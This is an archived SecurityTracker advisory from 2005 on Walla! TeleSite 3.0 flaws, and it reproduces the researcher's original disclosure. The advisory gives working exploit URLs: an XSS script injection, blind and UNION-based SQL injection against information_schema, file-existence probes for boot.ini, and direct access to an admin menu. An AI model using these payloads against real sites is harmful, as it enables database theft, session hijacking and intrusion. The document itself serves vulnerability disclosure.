SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   TeleSite Vendors:   Walla! Communications
Walla! TeleSite Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015204
SecurityTracker URL:  http://securitytracker.com/id/1015204
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 14 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 3.0 and prior versions
Description:   Rafi Nahum reported a vulnerability in Walla! TeleSite. A remote user can inject SQL commands and conduct cross-site scripting attacks. A remote user can also determine whether specified files exist on the target system.

The script does not properly validate user-supplied input in the 'tsurl' parameter and in HTTP GET, POST, and cookie parameters.

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the TeleSite software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<script>alert()</script>

A remote user can also supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1

http://[target]/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2

http://[target]/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%2
0union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,nu
ll,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ry
y','poo','polo','nike'%20from%20information_schema.columns--

A remote user can also supply a full path name as a parameter to 'ts.cgi' to determine if the specified file exists.

Some demonstration exploit URLs are provided:

http://[target]/ts.cgi?c:\boot.ini
http://[target]/ts.cgi?c:\boot1.ini

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the TeleSite software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can determine if files exist on the target system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.walla.co.il (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Walla TeleSite Multiple Vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    Walla TeleSite
Vendors:        http://www.walla.co.il
Versions:       3.0 and perior
Platforms:      Windows (ISAPI, a few vulnerabilities apply Linux too)
Bug:                Multiple Vulnerabilities
Exploitation:   Remote with browser
Date:              13 Nov 2005
Author:           Rafi Nahum, Pokerface
e-mail:            rafiware@bezeqint.net
web:               Not Yet....but soon

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Walla TeleSite is a Website Content Managment CGI web application.
It is very common amoung big israeli websites. It also used as a wrapper to
all the website links. It is also used by Walla.co.il and the Walla.com
Network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The TeleSite wraps the website with templates and ids to all the links.
The main navigation page ts.exe receives a parameter called 'tsurl' and it
does
not verifies/limits the numbers it receives, for example it should receive
0.22.1.0
if there is such a page, but it shouldn't 0.1.0.0 because it leads to the
private articles
menu of administrator.

In addition, further input filtering is missing in the webpages
Get/Post/Cookie parameters, this is a "feature" missing to this software
which causes
the web programmers using this website content managment engine to think
their parameters
are filtered, well they are'nt and this causes all their clients to have
Script and SQL Injections.
Where it is obvious that an SQL Injection may lead to complete remote
compromise if the
website and XSS to content spoofing, phishing, cookie stealing, D.O.S
attacks and more.

The TeleSite application also does not saves the errors to itself...in an
error.log or something
similar, it informs the attacker with the local path of the files it could
not open/access when
the attacker tempares with the website parameters. A remote attacker can
also enumerate
all the files on the machine by supplying their full path to ts.cgi after
the querystring.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Articles Menu Access:
--------------------------------
 http://host/ts.exe?tsurl=0.1.0.0


Cross Site Scripting - XSS:
--------------------------------------

http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<scr
ipt>alert()</script>


Blind SQL Injection:
-----------------------------
 Proof Of Concept:

http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
20'1'='1

http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
20'1'='2

 Exploitation:

http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%2
0union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,nu
ll,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ry
y','poo','polo','nike'%20from%20information_schema.columns--


Local Path Disclosure:
-------------------------------
 D:\TeleSite\online\templates\\example\sections\header


Local File Enumeration:
---------------------------------
 http://host/ts.cgi?c:\boot.ini
 http://host/ts.cgi?c:\boot1.ini


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafi Nahum, Pokerface
Greetings to The-Insider

"Pokerface is the name, reputation follows."
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC